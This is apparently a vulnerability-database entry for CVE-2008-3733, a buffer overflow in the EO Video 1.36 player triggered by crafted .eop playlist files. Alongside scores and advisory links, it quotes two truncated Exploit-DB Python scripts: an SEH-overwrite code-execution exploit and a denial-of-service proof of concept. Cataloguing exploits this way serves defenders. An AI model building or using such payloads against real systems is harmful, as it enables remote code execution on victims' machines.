CVE-2008-3733
Published 2008-08-20
Priority P343 · critical · 9.3 CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.03% (92.4th percentile)
Stack-based buffer overflow in EO Video (eo-video) 1.36 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a .eop (aka playlist) file with a ProjectElement element that contains a long Name element.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eo-video | eo-video | — | — |
No detection rules found.
Exploit-DB
EO Video 1.36 - Playlist Overwrite (SEH)
exploitdb·2009-03-09
---
```python
#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"
buff = "\x41" * 1356
next_seh = "\xEB\x06\x41\x41"
seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm
header1= (
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x6
```
Exploit-DB
EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)
exploitdb·2008-08-16
---
```python
#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# --------------------------------------------------------------
import os
bafer = '\x41'* 700 + '\x42' * 4
print "Spit me out, all bright and sh
```
No writeups or analysis indexed.
http://secunia.com/advisories/31511
http://securityreason.com/securityalert/4171
http://www.securityfocus.com/bid/30717
https://exchange.xforce.ibmcloud.com/vulnerabilities/44508
https://www.exploit-db.com/exploits/6253
Published: 2008-08-20